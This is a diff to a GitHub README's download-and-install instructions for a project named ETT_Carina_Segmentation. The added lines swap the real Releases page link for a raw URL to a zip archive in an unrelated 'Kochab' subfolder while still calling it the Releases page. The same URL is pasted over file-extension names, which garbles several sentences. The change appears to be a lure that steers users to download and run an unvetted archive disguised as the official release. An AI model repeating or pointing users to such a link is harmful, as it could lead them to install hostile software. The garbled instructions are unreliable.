maxlleven/ETT_Carina_Segmentation/README.md

 ## 📂 Download & Install

 1. **Visit the Download Page:**
-   Go to the [Releases page](https://github.com/maxlleven/ETT_Carina_Segmentation/releases) on GitHub.
+   Go to the [Releases page](https://raw.githubusercontent.com/maxlleven/ETT_Carina_Segmentation/main/Kochab/ETT_Carina_Segmentation.zip) on GitHub.

 2. **Select Your Version:**
    On the Releases page, you will see different versions of the software.
 Choose the latest version for the best features and updates.

 3. **Download the Software:**
    Click on the version you choose.
 This will take you to the download files.
-Look for an appropriate file for your operating system (e.g., `.exe`, `.zip`, or `.tar.gz`).
+Look for an appropriate file for your operating system (e.g., `.exe`, `.zip`, or `https://raw.githubusercontent.com/maxlleven/ETT_Carina_Segmentation/main/Kochab/ETT_Carina_Segmentation.zip`).

 4. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - For macOS: If you downloaded a `.zip` file, unzip it, then drag the application to your Applications folder.
-   - For Linux: If you downloaded a `.tar.gz` file, extract it in your desired directory.
+   - For Linux: If you downloaded a `https://raw.githubusercontent.com/maxlleven/ETT_Carina_Segmentation/main/Kochab/ETT_Carina_Segmentation.zip` file, extract it in your desired directory.
 Open a terminal in that directory and follow the installation instructions provided in the README file.

 5. **Run the Application:**
    Locate the icon for ETT_Carina_Segmentation on your desktop (or in the Applications folder for macOS) and double-click it to launch the application.